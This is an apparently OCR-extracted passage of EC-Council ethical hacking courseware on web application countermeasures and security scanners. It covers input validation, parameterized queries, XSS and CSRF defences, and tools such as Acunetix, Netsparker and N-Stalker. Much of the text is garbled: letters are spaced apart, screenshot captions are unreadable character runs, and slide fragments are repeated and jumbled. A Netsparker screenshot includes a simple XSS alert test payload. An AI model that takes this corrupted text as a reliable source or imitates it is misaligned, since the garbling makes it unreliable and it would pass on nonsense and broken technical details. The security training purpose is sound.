Tree Selection filters conversation list Url ? http://www.owasp.org:80/ 3 ] banners/ o- C3 images/ ? Indexphp/ Q Main_Page oskins/ -----: ate Method 2U0BZDE/2XT Gfc 1 2006/06/23... GET 2006/06/23. GET 2006/06/23 GET 2006/06/23... GET Methods GET Status Set-Cookle 301 Moved... 200 OK Status 2UU UK 200 OK 200 OK 200 OK 301 Moved... Origin Proxy Proxy Proxy Proxy Proxy I Comments Scripts J 0 A
GET --Host Path http://www. owas p.0rg:8U /SKins/monoDOOKfmain 'N http:/ / Www.owas p.0rg:80 /skms/common/IEFixes. http://www. owa sp.0rg:80 /skins/common/commo http://Www.owasp.org 80 /index php/Main_Page http://Www.owasp.org:80 / III Parameters
ID 4 3
2
1
i.27/63.56
EC-C0UnCil
HttpBee
h ttp ://w w w . oOo. nu
w3af
h ttp ://w 3 a f. sourceforge, net ^ ^4 )
Teleport Pro
h ttp ://w w w . tenmax. com
GNU Wget
http ://g nu w in 3 2 . source forge, net
WebCopier
BlackWidow
h ttp ://so ftb ytelab s. com
&
HTTTRACK
h ttp ://w w w . httrack. com
f3
cURL
h ttp ://c u r I. haxx. se
MileSCAN ParosPro
h ttp ://w w w . miles can. com
EC-C0UnCil
M o d u le F lo w
W e b A p p Pen Testing
0 I , &
W e b A p p C oncepts
S ecurity Tools
W e b A p p T h rea ts
C o un term ea su re s
^M odule Flow
So fa r, w e h a ve d iscu sse d v a r io u s c o n c e p t s such as t h r e a t s a s s o c ia te d w i t h w e b a p p lic a tio n s , h a c k in g m e t h o d o l o g y , a nd h a c k in g to o ls . All th e s e t o p ic s t a l k a b o u t h o w t h e a t t a c k e r b re a k s i n t o a w e b a p p li c a t i o n o r a w e b s i t e . N o w w e w ill discuss w e b a p p li c a t i o n c o u n t e r m e a s u r e s . C o u n t e r m e a s u r e s a re t h e p r a c tic e o f u s in g m u l t i p l e s e c u r it y s y s te m s o r te c h n o lo g ie s to p re ve n t i n t r u s io n s . These a re th e key co m p o n e n ts fo r p ro te c tin g a nd s a f e g u a r d in g t h e w e b a p p li c a t i o n a g a in s t w e b a p p li c a t i o n a tta c k s .
W e b A p p Pen Testin g
/jj& M k
W e b A p p C oncepts
S e cu rity Tools
W e b A p p T h re a ts
m
W e b A p p lic a tio n H acking Tools vf 1
EC-C0UnCil
T his s e c tio n h ig h lig h ts v a r io u s w a y s in w h i c h y o u can d e f e n d a g a in s t w e b a p p li c a t i o n a tta c k s such as SQL in j e c t i o n a tta c k s , c o m m a n d i n j e c t i o n a tta c k s , XSS a tta c k s , e tc.
EC-C0UnCil
E n c o d in g S c h e m e s
Web applications employ different encoding schemes for their data to safely handle unusual characters and binary data in the way you intend
C EH
URL e n c o d in g is t h e p ro c e s s o f c o n v e rtin g URL in to v a lid ASCII f o r m a t so t h a t d a ta c a n b e s a fe ly t r a n s p o r te d o v e r HTTP URL e n c o d in g re p la c e s u n u s u a l ASCII c h a ra c te rs w ith "% " fo llo w e d b y t h e c h a ra c te r's t w o - d ig it ASCII c o d e e x p re s s e d in h e x a d e c im a l s u c h as: %3 d
Encoding Schem es
HTTP p r o t o c o l a n d t h e B o th th e s e H T M L la n g u a g e a re t h e t w o a re t e x t b ase d. W e b m a jo r c o m p o n e n ts e m p lo y of web e n c o d in g a p p lic a tio n s . co m p o n e n ts a p p li c a t i o n s
s c h e m e s t o e n s u r e b o t h th e s e c o m p o n e n t h a n d le u n u s u a l c h a r a c te r s a n d b i n a r y d a t a s a fe ly . T h e e n c o d i n g s c h e m e s in c lu d e :
m
w h e n t h e y a re m e n t i o n e d in t h e URL s c h e m e o r HTTP p r o t o c o l . H e n c e , such c h a r a c te r s are re s tric te d . URL e n c o d i n g is t h e p ro ce ss o f c o n v e r t i n g URLS i n t o v a lid ASCII f o r m a t so t h a t d a ta can be s a fe ly t r a n s p o r t e d over HTTP. URL e n c o d i n g r e p la c e s u n u s u a l ASCII c h a r a c te r s w i t h
"% "
EC-C0UnCil
> ***
H T M L E n c o d in g T h e H T M L e n c o d i n g s c h e m e is u sed t o r e p r e s e n t u n u s u a l c h a r a c te r s so t h a t t h e y can be
s a fe ly e n t e r e d w i t h i n an H T M L d o c u m e n t as p a r t o f its c o n t e n t . T h e s t r u c t u r e o f t h e d o c u m e n t is d e f i n e d by v a r io u s c h a r a c te r s . If y o u w a n t t o use t h e s a m e c h a r a c te r s as p a r t o f t h e
d o c u m e n t 's c o n t e n t , y o u m a y fa c e p r o b l e m . T his p r o b l e m can be o v e r c o m e b y u sin g H T M L e n c o d in g . It d e fin e s s e v e ra l H T M L e n t i t i e s t o r e p r e s e n t p a r t i c u l a r l y usual c h a r a c te r s such as: Q e e &am p; & it; & g t; & < >
EC-C0UnCil
E n c o d in g S c h e m e s
(Cont1 (!)
B ase64 Encoding
Base64 encoding scheme represents any binary data using only printable ASCII characters
C EH
Hex Encoding
HTML encoding schem e uses hex value of e ve ry character to represent a collection of characters for transm itting binary data
tt
Base 64 Encoding
Base 64 sche m e s a re re p re s e n ts any b in a ry used t o d a ta encode o n ly b in a ry d a ta . A Base 64 e n c o d in g s chem e u sing p rin ta b le ASCII c h a ra c te rs . safe tra n s m is s io n over U s u a lly it is also of e v e ry
Hex Encoding
A n H T M L e n c o d in g sc h e m e uses h e x v a lu e c h a ra c te r to re p re s e n t a c o lle c tio n o f c h a ra c te rs f o r tra n s m ittin g b in a ry da ta . E xa m ple:
Hello Jason
A125C458D8 123B684AD9
cake
0110001101100001011010110110 0101
Base64 Encoding: 011000
%u2215 %u00e9
U TF-8 It is a
v a r ia b le - le n g t h th a t in uses
e n c o d in g each b y te and
s ta n d a rd e x p re s s e d
h e x a d e c im a l
p r e c e d e d b y t h e % p r e f ix :
% c2% a9
%2%89%a0
Ethical Hacking and C ounterm easures Copyright by EC-C0l1nCil All Rights Reserved. Reproduction is S trictly Prohibited.
C EH
JT
A lw a y s use m e th o d a ttr ib u te s e t t o POST Run d a ta b a s e se rv ic e a c c o u n t w ith m in im a l rig h ts M o v e e x te n d e d s to re d p ro c e d u re s t o an is o la te d s e rv e r Use typesafe variables o r fu n c tio n s such as IsN um eric() t o ensure ty p e s a fe ty V a lid a te a n d s a n itiz e user in p u ts passed t o th e d a ta b a s e Use lo w p riv ile g e d a c c o u n t f o r DB c o n n e c tio n
M ic ro s o ft
SQL S e rve r
EC-C0UnCil
Use l o w p r iv ile g e d a c c o u n t f o r DB c o n n e c t i o n
EC-C0UnCil
- - J L E !
0
^ '
w h e r e v e r p o ssib le . S o m e la n g u a g e s p e c ific lib r a r ie s p e r f o r m i d e n t ic a l f u n c t i o n s f o r m a n y shell c o m m a n d s a n d s o m e s y s te m calls. T h e s e lib r a r ie s d o n o t c o n t a i n t h e o p e r a t i n g s y s te m shell i n t e r p r e t e r , a n d so i g n o r e m a x i m u m shell c o m m a n d p r o b l e m s . For t h o s e calls t h a t m u s t still be used , such as calls t o b a c k e n d d a ta b a s e s , o n e m u s t c a r e f u l l y v a li d a t e t h e d a ta t o e n s u r e t h a t it d o e s n o t c o n t a i n m a lic io u s c o n t e n t . O n e can also a r r a n g e v a r io u s r e q u e s ts in a p a t t e r n , w h i c h e n s u re s t h a t all g iv e n p a r a m e t e r s a re t r e a t e d as d a ta in s te a d o f p o t e n t i a l l y e x e c u t a b l e c o n t e n t . M o s t s y s te m calls a n d t h e use o f s t o r e d p r o c e d u r e s w i t h p a r a m e t e r s t h a t a c c e p t v a lid i n p u t s tr in g s t o access a d a ta b a s e o r p r e p a r e d s t a t e m e n t s p r o v id e s i g n ific a n t p r o t e c t i o n , e n s u r in g t h a t t h e s u p p lie d i n p u t is t r e a t e d as d a ta , w h i c h r e d u c e s , b u t d o e s n o t c o m p l e t e l y e l i m i n a t e t h e risk in v o lv e d in th e s e e x t e r n a l calls. O n e can a lw a y s a u t h o r i z e t h e in p u t to e n s u re t h e p r o t e c t i o n o f t h e a p p li c a t i o n in q u e s t i o n . Least p riv ile g e d a c c o u n ts m u s t be u sed t o access a d a ta b a s e so t h a t t h e r e is t h e s m a lle s t p o s s ib le lo o p h o le . T h e o t h e r s t r o n g p r o t e c t i o n a g a in s t c o m m a n d i n j e c t i o n is t o ru n w e b a p p li c a t i o n s w i t h t h e p riv ile g e s r e q u i r e d t o c a r r y o u t t h e i r f u n c t io n s . T h e r e f o r e , o n e s h o u ld a v o id r u n n i n g t h e w e b s e rv e r as a r o o t , o r a cc e ssin g a d a ta b a s e as a D B A D M I N , o r else an a t t a c k e r m a y b e a b le t o m is u s e a d m i n i s t r a t i v e r ig h ts . T h e use o f Java s a n d b o x in t h e J2EE e n v i r o n m e n t s to p s t h e e x e c u t i o n o f t h e s y s te m c o m m a n d s .
EC-C0UnCil
w r o n g . O t h e r w i s e , an a t t a c k m a y o c c u r a n d n e v e r be d e t e c t e d . P e r f o r m i n p u t v a li d a t i o n Use la n g u a g e - s p e c ific lib r a r ie s t h a t a v o id p r o b l e m s d u e t o shell c o m m a n d s Use a s afe API t h a t a v o id s t h e use o f t h e i n t e r p r e t e r e n t i r e l y Use p a r a m e t e r i z e d SQL q u e r ie s Escape d a n g e r o u s c h a r a c te r s P e r f o r m i n p u t a n d o u t p u t e n c o d in g S t r u c t u r e r e q u e s ts so t h a t all s u p p lie d p a r a m e t e r s a re t r e a t e d as d a ta , r a t h e r t h a n p o te n tia lly e x e c u ta b le c o n te n t Use m o d u l a r shell d is a s s o c ia tio n f r o m k e rn e l
EC-C0UnCil
H ow to D e fe n d A g a in st XSS A tta ck s
V a lid a te a ll h e a d e r s , c o o k ie s , q u e r y s tr in g s , f o r m f ie ld s , a n d h id d e n f ie ld s ( i. e ., a ll p a r a m e t e r s ) a g a in s t a r ig o r o u s s p e c ific a t io n E n c o d e In p u t and o u tp u t and f ilt e r M e ta c h a r a c te r s in t h e in p u t U s e t e s t i n g t o o ls e x t e n s iv e ly d u r in g t h e d e s ig n p h a s e t o e lim in a t e s u c h XSS h o le s in t h e a p p lic a tio n b e f o r e i t g o e s in t o u s e
C EH
D o n o t a lw a y s t r u s t w e b s it e s t h a t u s e HTTPS w h e n it co m e s to XSS
\y
D e v e lo p s o m e s ta n d a rd o r s ig n in g s c rip ts w ith p r iv a te a n d p u b lic k e y s t h a t a c tu a lly c h e c k t o a s c e rta in t h a t t h e s c rip t in tr o d u c e d is re a lly a u th e n tic a te d
%
\
4
/
/
C o n v e r t a ll n o n a lp h a n u m e r ic c h a ra c te rs t o H T M L c h a r a c te r e n titie s b e fo r e d is p la y in g t h e u s e r in p u t in s e arch e n g in e s a n d f o r u m s
F ilt e r in g s c r ip t o u t p u t c a n a ls o d e f e a t XSS v u l n e r a b il it ie s b y p r e v e n t in g t h e m f r o m b e in g t r a n s m i t t e d t o u s e rs
v u l n e r a b i l i t y is d is c o v e r e d in o n e w e b s i t e , t h e r e is a h ig h c h a n c e o f it b e in g v u ln e r a b l e t o
c o o k ie s , q u e r y s tr in g f o r m fie ld s , a n d h id d e n fie ld s . D u r in g t h e v a li d a t i o n p ro ce ss, t h e r e m u s t be n o a t t e m p t t o re c o g n iz e t h e a c tiv e c o n t e n t , n e i t h e r t o r e m o v e t h e f i l t e r n o r s a n itiz e it. T h e r e a re m a n y w a y s t o e n c o d e t h e k n o w n f i l t e r s f o r a c tiv e c o n t e n t . A " p o s i t i v e s e c u r i t y p o l i c y " is h ig h ly r e c o m m e n d e d , w h i c h s p e c ifie s w h a t has t o be a ll o w e d a nd w h a t has t o be r e m o v e d . N e g a t iv e o r a t t a c k s ig n a t u r e - b a s e d p o lic ie s a re h a r d t o
EC-C0UnCil
C EH
EC-C0UnCil
C EH
Urt1fw4 ilhiul lUtbM
Configure W SD L Access Control Permissions to grant or deny access to any type of WSDL-based SOAP messages
Use multiple security credentials such as X.509 Cert, SAML assertions and WS-Security
Block external references and use pre-fetched content when de-referencing URLs
D e p lo y w e b - s e r v ic e s - c a p a b le f i r e w a l l s c a p a b le o f SOAP- a n d ISAPI-level f i l t e r i n g .
EC-C0UnCil
M a i n t a i n a n d u p d a t e a s e c u re r e p o s i t o r y o f X M L s c h e m a s .
EC-C0UnCil
C EH
B ro k e n A u t h e n t i c a t io n a n d S e s s io n M a n a g e m e n t
8 U se SSL f o r a ll a u th e n tic a te d p a rts o f th e a p p lic a tio n V e rify w h e th e r a ll th e users' id e n titie s a n d c re d e n tia ls a re s to re d in a h a s h e d fo r m N e v e r s u b m it session d a ta as p a rt o f a GET, POST
C ro s s -S ite R e q u e s t Forgery
L o g o ff im m e d ia te ly a f te r using a w e b a p p lic a tio n and c le a r th e h is to r y Do n o t a llo w y o u r b ro w s e r and w e b s ite s t o save lo g in d e ta ils C heck th e HTTP R e fe rre r h e a d e r and w h e n pro c e s s in g a POST, ig n o re URL p a ra m e te rs
I n s e c u r e C r y p to g r a p h ic S to r a g e
C D o n o t c re a te o r use w e a k c r y p to g ra p h ic a lg o r ith m s G e n e ra te e n c r y p tio n k e y s o fflin e a n d s to re th e m s e c u re ly E nsure th a t e n c ry p te d d a ta s to re d o n disk is n o t easy t o d e c r y p t
B r o k e n A u t h e n t i c a t i o n a n d S e ssio n M a n a g e m e n t Use SSL f o r all a u t h e n t i c a t e d p a r ts o f t h e a p p lic a t io n . V e r if y w h e t h e r all t h e u sers' i d e n t it ie s a n d c r e d e n t i a l s a re s t o r e d in a h a s h e d f o r m . N e v e r s u b m i t session d a ta as p a r t o f a GET, POST.
EC-C0UnCil
EC-C0UnCil
/ \ y /
S S S 2 S
I n s u f f i c i e n t T r a n s p o r t L a y e r P r o te c t io n
Non-SSL requests to web pages should be redirected to the SSL page Set the 'secure' flag on all sensitive cookies Configure SSL provider to support only strong algorithms Ensure the certificate is valid, not expired, and matches all domains used by the site Backend and other connections should also use SSL or other encryption technologies
TA
T A
D i r e c t o r y T ra v e rs a l
5 6 Define access rights to the protected areas of the website Apply checks/hot fixes that prevent the exploitation of the vulnerability such as Unicode to affect the directory traversal
V \
sv
S S t! S
C o o k ie /S e s s io n P o is o n in g
Do not store plain text or weakly encrypted password in a cookie Implement cookie's tim eout Cookie's authentication credentials should be associated with an IP address Make logout functions available .Ccipyright by EC-CounGil. All Rights Reservei;Reproduction is Strictly Prohibited.
EC-C0UnCil
EC-C0UnCil
C EH
F ile I n j e c t i o n A tta c k
S tro n g ly v a lid a te u s e r in p u t C o n s id e r im p le m e n tin g a c h r o o t ja il PHP: D isable a llo w _ u r l_ fo p e n and a llo w _ u rl_ in c lu d e in p h p .in i PHP: D isable re g is te r_ g lo b a ls and use E _ S T R IC T to fin d u n in itia liz e d v a ria b le s PHP: E nsure th a t a ll f ile and s tre a m s fu n c tio n s (s tre a m _ * ) a re c a r e fu lly v e tte d
Scan f o r la t e s t s e c u r it y v u ln e r a b i l it ie s a n d a p p ly t h e la t e s t s e c u r i t y p a tc h e s .
L D A P In je c t io n A tt a c k s
Ethical Hacking and C ounterm easures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
File In je c tio n A tta c k e 0 S t r o n g ly v a li d a t e u s e r in p u t . C o n s id e r i m p l e m e n t i n g a c h r o o t ja il. PHP: D isa b le a l l o w _ u r l _ f o p e n a n d a l l o w _ u r l _ i n c l u d e in p h p .in i. PHP: D isa b le r e g is t e r _ g lo b a ls a n d use E_STRICT t o f i n d u n in it ia liz e d v a ria b le s . PHP: E n sure t h a t all file a n d s tr e a m s f u n c t i o n s ( s t r e a m _ * ) a re c a r e f u l l y v e t t e d .
EC-COUIICil
C EH
Make LDAP filter as specific as possible O p e ra tin g System LDAP S erver C ustom Error Page
in j e c t i o n , a n d m in i m i z e use o f t h i r d - p a r t y a p p li c a t i o n s t o p r o t e c t t h e w e b a p p lic a tio n s . You can also use s t o r e d p r o c e d u r e s a n d p a r a m e t e r q u e r ie s t o r e t r i e v e d a ta a nd d is a b le v e r b o s e e r r o r m essa ge s, w h i c h can g u id e t h e a t t a c k e r w i t h s o m e u s e fu l i n f o r m a t i o n a n d use c u s t o m e r r o r p ages t o p r o t e c t t h e w e b a p p lic a tio n s . T o a v o id SQL in j e c t i o n i n t o t h e d a ta b a s e , c o n n e c t u s in g a n o n - p r i v i l e g e d a c c o u n t a nd g r a n t le a s t p riv ile g e s t o t h e d a ta b a s e , ta b le s , a nd c o lu m n s . D isab le c o m m a n d s like x p _ c m d s h e ll, w h i c h can a f f e c t t h e OS o f t h e s y s te m .
EC-C0UnCil
yy
1 11 liiil
A tta c k e r
L o g in F o rm
In te rn e t
Connect to the database using non-prlvileged account Use stored procedures and param eter queries Grant least privileges to the database, tables, and columns Analyze the source code for SQL injection M inimize use o f 3rd party apps S a n itiz e a n d f i l t e r u s e r in p u t
* *
W e b A p p lic a tio n
A
M ake LDAP filte r as specific as possible O p e r a tin g S y s te m LD AP S e rv e r Disable verbose error messages and use custom error pages
7 ? \
C u s to m E rro r Page
EC-C0UnCil
M o d u le F lo w
W e b A p p Pen Testing
0 I , &
W e b A p p C oncepts
W e b A p p T h rea ts
" *S
C o u n term ea su re s
^M odule Flow
N o w w e w i ll discuss w e b a p p li c a t i o n s e c u r it y to o ls . W e b a p p li c a t i o n s e c u r it y t o o ls h e lp y o u t o d e t e c t t h e p o s s ib le v u ln e r a b i l it ie s in w e b a p p li c a t i o n s a u t o m a t i c a ll y . P r io r t o th is , w e d iscu sse d w e b a p p li c a t i o n c o u n t e r m e a s u r e s t h a t p r e v e n t a t ta c k e r s f r o m e x p l o i t i n g w e b a p p l i c a t i o n s . In a d d i t i o n t o c o u n t e r m e a s u r e s , y o u can also e m p l o y s e c u r it y t o o l s t o p r o t e c t y o u r w e b a p p li c a t i o n s f r o m b e in g h a c k e d . T o o ls in a d d i t i o n t o t h e c o u n t e r m e a s u r e s o f f e r m o r e p ro te c tio n .
W e b A p p Pen Testin g
W e b A p p C oncepts
S e c u r i t y T o o ls
W e b A p p T h re a ts
C o u n te rm e a s u re s
is ! !L 3
H acking M e th o d o lo g y
Ok
M odule 13 Page 1938 Ethical Hacking and C ounterm easures Copyright by
EC-C0UnCil
EC-C0UnCil
r Eu i
: File
Actions
Took ;
Confirmation
Help
_
a I -
3 a |*>
J | jt Rpperi
a |3 I | i
yStal JRl: lhl^)://lcsta*pret.'Ain*1el%J Piofife: Drffljl! gjj Alerts summary 77 alerts
V d n x tb M y
S co n R ett**
Tests w e b fo r m s a nd p a s s w o rd p r o te c te d areas
It in c lu d e s an a u to m a tic c lie n t s c rip t a n a ly z e r a llo w in g f o r s e c u rity te s tin g o f A jax and W eb 2 .0 a p p lic a tio n s
OMTTPEdto HTVsmffcr vfc HTTPPuzse: AutfwcM)n 1ee*r C O w e < te * J t *if! & web servrt Web Sc^vrc* Seanne ^ : Web Se v?e* td * r
- 0 5anT)r*: ( htto:/.tgs:aspnct.v<Jrr*cb. * >I B A0Aet3(77) 5 O ASSJE saddnqCradeYjnefablt * Q Bed SQ L ir*rcson PJ O cro* sue s r o tr g Cverrfted) C IO ) r s a *jeefco
r
Acunetix Threat Level J One or more hign seventy type vuinerabilrtifs hw t been dntcrertO b> west vj1ntrst>1ir!1; 3rd conproT1; tne backend database and'or de45ff you'
O *o d c a c c ne rc rire s e a c c(3 ]
O ASPJETefr ne*M 9-{l)
(2 1 )
ft O C ro wP ro n eS ar^rg(8 )
9 O U a ed" * are sent n J*(
B l t JC o r A y u m t b n
S:*" ' Ht'gv
5 ^ 5 * *
S
t \
S un11 rinah.d
<L
V /rr:< x :0.20 01:30.02. SQl n a n -Srd) >*. * p* a 10.i0 O l J i J / , Mushed scanning. 10.20 01:22.32, Savng scan rJ!3 0 database... 12.20 01:32.39, Dcnr wv n , b 10.20 01:32.39, Fua t e Wftr*.
IfU lt',
d n : / t u n r .
http://w ww .acunetix.com
Copyright by EC-Gauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
in j e c t i o n , XSS, a n d o t h e r w e b v u ln e r a b i l it ie s . It in c lu d e s a d v a n c e d p e n e t r a t i o n t e s t i n g to o ls , such as t h e HTTP E d ito r a nd t h e HTTP Fuzzer. It p o r t scans a w e b s e r v e r a n d r u n s s e c u r it y ch e c k s a g a in s t n e t w o r k servic es. It e v e n te s ts w e b f o r m s a n d p a s s w o r d - p r o t e c t e d a reas. T h e a u t o m a t i c c l i e n t s c r ip t a n a ly z e r a llo w s f o r s e c u r it y t e s t i n g o f A j a x a n d W e b 2 .0 a p p li c a t i o n s .
EC-C0UnCil
In
File Actions Tools J Configuration >- A H dp
1-1
K? |
<
& |
B 07 T o o la
H 5 fr Sice Crawler \f i Target Firder
Alwts summary
77 alerts Acunetix Threat Level 3 One or m ore highseveritytype vulnerabilities have been discovered b y the scanner. Am alicious user can exploit these vulnerabilities and com prom isethe
backend database and/or deface your website.
L e v e l 3: High
B
B B B B B B B B B B B
Total alertsfound
0 High
User credentials ae sent in dear te. Login page password-guessing attec CPTIONS metnod s erabled (1) Session Cookie without Secure flag Error page Web Sefve- vetsior dsd QHDB: Frontpage extensions for Uni QHDB: Possible ASP.fCT sensitve i Q O B : Tycal login paje (10)
OM e d iu m
O 0 lo w Informational
100.00% @
1* P rogress
< | _
A ctivity V /ind o w
M l
|> | 1
P urch ase
)User Manual (html User Manual (pdf ]<( ' # AcuSensor
10.20 01:3237, Finished scanning. 10.20 01132.37, S aving s canresu lts todatabase ..
10.20 01:32.39, Done saving database. 10.20 01:32.39, Hush file butlers. |A^icaton''(^]| Error Log
Ready
EC-COlMCil
C EH
/ * ,
Q 5H W o
jg I w p e c t o r s I / * u t o R e a p o n d i r | ID Log I mcto;
R e q u e s tBuoa 1
WfaSaK v8'
I_ E
Header - Check tM catrte-ojitm l HTTP header met to the regorg' H *a< 1* 0 * 3 that a Cortart -Type n U hciuded h the HTTPreeponee and ^e>t8 whent <* Header Checks that IE?* XSSprotecten Bier K oartf been ebabled bythe Webappteabon ader Check*mat the XOONTENT-TYPEOPTtONSdeferwe aflarvt M1MEfFlnflhabeen dedwd*4 Header Checks th* !he XFRAMEOPTIONSheader n berg set for defer aqarat CkkJaefcro'attacks B Hwdy L ccfcter .ek aUt-rBcaticr prctocda 0 rtomjloi {c!c*/n Owck for conwon emt nrnagai tunedby database* *Hi* may r d a e 931 ! 7 rfy -Bcn Dadeare Oieek for dubom eoiment that vnairartfutheraBemicr HornAon D*3cjv Looktoi mUv rtanntieripajesdttrojtfi HTTPwwwt olunw! w*ra look for semttve rfenrater paiied Ihrou^i U R L(M raweters
J J J
v A x
~ 7
kV.wBSX
TSrt rw k mil srarch MTMl convnt, ineludmo comment! k common error mcssnor * returned by ptmtewns sue! as Af.PNTT and Web savers such 09 IIS ond Apoebe Y < hh 1 ftonfioure Ibe l!v of common debug mev-wsoes look tor
| 6#<t
'S o Jf t * . '*
ytm ralje
IV* j rxjut m i: 3 User -rp>-f aa fartd m the felong data of an 'cnerror' event;
watdier Web Security Tool vt^.O, Copy right C 2010 C3;3ba Seem.. ..C- A JI tc!*t: reserved.
casasa
Aatc V/cDSecurity Tool vlJ.O, CooyriQht20:0 Casa&a Security. LLC. All risnu reserved.
http://www.casaba.com
Copyright by EG -G llic il. All Rights Reserved. Reproduction is Strictly Prohibited.
JL
Ethical Hacking and C ounterm easures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
EC-C0UnCil
C EH
s u c h as SQ L
in a s in g le in t e g r a t e d e n v ir o n m e n t
s fa
1 1
CMnWSw
Cross-site Scripting
U R L
l a x / / 1c5tJ7.ne2Mrtr.cQm:8l8! 1fflefwra/MSiDyreftected3 2 ,otol P* * H * 0101 6 * j . Krtpt: c
PA R A M ET ER ptrm M A M E PA R A M ET ER T V PC (Jjfryitnnj A T T A C K PA T T tR M <KJtX>fefl(0100001a)< VULNERABILITY DETAILS X SS(OwrMt S o H A m u )dv1 tv * .* * dr*on1 kjhA (!**C'pC V W c 1 <( >* U o* a 0 p b catn alc t t. ts il M V irtn t o * p 4 rtu n * 1 4 m o ith t cvr< n t M ix yi tt *x m r t*tfunfm ]V m kvoV (4ttw *0 M )*b * w tm* vto ^
k i k i
CLASSIFICATION
:.0 tu LU
a:
OWAV
S c a ra n d C o n fa rra tc n firn ts d
EC-C0UnCil
Q ] tcrst37.nebpdrker.eom - Netipaikei 2.0.0.0 ( Mavituna Security Limited -1 Seat) I ; File tyew Reporting Settings Community fcjelp j ? Stoit u1
r s if s ir w i j
Vulnerability
Browser View
Retest
Controlled Scan
0 - & dilemma
C ro s s -s ite S c r ip t in g
URL
param=<script>alert(0x000016)<! script?
C O N F IR M E D
32.php
1| J *
h t t p : / / t e s t 3 7 . n e t s p a r k e r . c o m : 8 0 8 1 / d lle m m a / x s s t b , r e f le c t e d / 3 Z .p h p
VULNERABILITY DETAILS
bean
CLASSIFICATION
PCI 2.0 PC11.2 OWASP 6.5.7 6.5.1 A2 -
Nnished
0 0 0 2/ 0 0 0 2
Scar Information
Current Speed: 2,6rcq.'5cc Average Speed: 3,7 req/sec Total Requests: 37 Fxiftd R#quet<
XSS (C ross-site Scripting) allow s an a tta c k e r to execute a dynam ic scrip t {)avascrot, VbScript) in th e co n te x t o f th e application. This allow s several d ffe re n t attack o p p o rtu n itie s, m ostly hijacking th e c u rre n t session o f th e user or changing th e lo o k o f the page by changing th e HTML on th e fly to 3teal th e
1-1
Issues (*)
Encoder
IT Logs (4)
j f 1 Proxy: Svstem[Ncne]
EC-C0UnCil
S e c u r it y T o o l: N S ta lk e r S e c u r ity S c a n n e r
EH
N -Stalker W eb A p p lica tio n S e cu rity Scanner is an e ffe c tiv e s u ite o f w e b s e c u rity a sse ssm e n t ch ecks to enhance th e o v e ra ll s e c u rity o f w e b a p p lica tio n s a ga in st a w id e ra ng e o f v u ln e ra b ilitie s and s o p h istica te d hacker atta cks
I t co n ta in s all w e b se c u rity a ssessm ent checks such a s : e e Code injection Cross-Site scripting Param eter tam pering W eb server vulnerabilities
I r. -:n AtMMffl 0
rl
mil.() M iJ (P) Low 1) MI>
\l
h ttp://nstalker.com
fjH^ Web A pplication Security Tool: NStalker Web _ Application Security Scanner
S o u rc e : h t t p : / / n s t a l k e r . c o m N -S ta lk e r W e b A p p lic a tio n S e c u r ity S c a n n e r p r o v id e s an e ffe c tiv e s u it e of web s e c u r it y
a s s e s s m e n t ch e cks t o e n h a n c e t h e o v e r a ll s e c u r it y o f y o u r w e b a p p l i c a t i o n s a g a in s t a w i d e r a n g e o f v u l n e r a b i l it ie s a n d s o p h is t ic a t e d h a c k e r a tta c k s . It also a llo w s y o u t o c r e a te y o u r o w n a s s e s s m e n t p o lic ie s a n d r e q u i r e m e n t s , e n a b lin g an e f f e c t i v e w a y t o m a n a g e y o u r a p p li c a t i o n 's SDLC, in c lu d in g t h e a b i l it y t o c o n t r o l i n f o r m a t i o n e x p o s u r e , d e v e l o p m e n t fla w s , i n f r a s t r u c t u r e issues, a n d real s e c u r i t y v u l n e r a b i l i t i e s t h a t can be e x p l o r e d by e x t e r n a l a g e n ts . It c o n ta in s all web s e c u r it y assessm ent ch e c k s such as code in j e c t i o n , c ro s s -s ite s c r ip tin g , p a ra m e te r
t a m p e r i n g , w e b s e r v e r v u ln e r a b i l it ie s , e tc .
EC-C0UnCil
TO
N -S ta k m S c a n n e r S ta rtS c a n n ^ n aftC ra w le rS a tin p a* : : C C o n tro lO p to n *f wG tftrjj J 1 T h re a d sa .E n c o d cU R I(I* S ) E S ta rtP ro x y U R L R e s tric tio nS e ttin g s1 tX J JH T T P F P K e y w o rdF e r T n e c u t1 5t | O d o t*S e ttlO fl S e a s o n M g m t F fl e ra 8: s e s s io nC o n tro l T h re a d sc o n tro l s p id e rc o n tro l t a is e -P o s * v eC o n tro l : n ttp / 1 0 0 0 2 j'
ft S c a n n e r
Ci O o je c ts
aD a s h b o a r d
* C o o p t.** ^ C o*.** N \ Irto G e c^ N < ( 0 7 M S D m *( S c a n S e s s o a_ S ta r;T m e D c 2 C .2 3 1 23 * :3 :5 3 C H e irs4 M rjte 3 S p id e ^ 9 8 03 C ra w le d U R L s 1 5 C ra w le db o s s 1 D e fa u iP a jeS z e 5 6 .1 1 7D rie s h ig h1 0 )N i l (9 )L o w (1 ) in ro(2 ) S c m E n y n a rutwort * B y te sS e rt 9 0 1 .5 2 6 T o ta lR e c u e s ' 3 2 9 2 6 6 v ie sR e c e iv e d 2 .0 2 91 1 0 F a te dR e q u e s ts 0 A * 0 R e s c o n s eT im e 3 5 2 5m s A tia c tsS e rf 3 1 5 2 6 1 7 A v qT ra n s fe rR ite 1 .7 5 2 8 8 K B /s * 0 4E rro rs 3 0 ?R e d rc c to n 0 F e o je s t& v ru te 7 3 10 0re o /m n
EC-COUIlCil
W e b A p p lic a t io n V a m p ir e S c a n
S e c u r i t y T o o l:
EH
V a m p ire S c a n
VampireScan allows users to test their own Cloud and Web applications for basic attacks and receive L actionable results all within their own Web portal
F e a tu re s
e
e
P rotect yo u r w ebsite fro m hackers Scan and p ro te ct yo ur infrastructu re and w eb applications fro m cyberthreats
Give you direct, actionable insight on high, m edium , and low risk vulnerabilities
http://www.vam piretech.com
EC-C0UnCil
1Summary
Se cu rity Grades Statistics Queued Scam Scans h Progress Accoutt Balance Unused Services Expiring Unused Services
A B C OI
F
0 0 $ 0 .00
Recent Activity
D rv n p lio n Q w San SM f rortW sc4nl*t1 sca n le il? Sm ncr Lat0 t Re*uft% Q o w \ R u n tw 3/28/2012 2 * 2 PM 3/27/2012 2:17 PM 3/24/2012 :12 AM HARM V .* r 2960 Vuln. M /M /l 6/2/0
0
R ev** Grade Previous Scam
S tatu s
m m m m m m
n
289 193/214/271 2314 124/148/113 4370 14634 12/1/0 44/42/65 &M Htory
* 4 ?* \ O il
m m
EC-C0UnCil
C EH
Websecurify
h ttp ://w w w . websecurify.com
OWASP ZAP
h ttp ://w w w . owasp. org
NetBrute
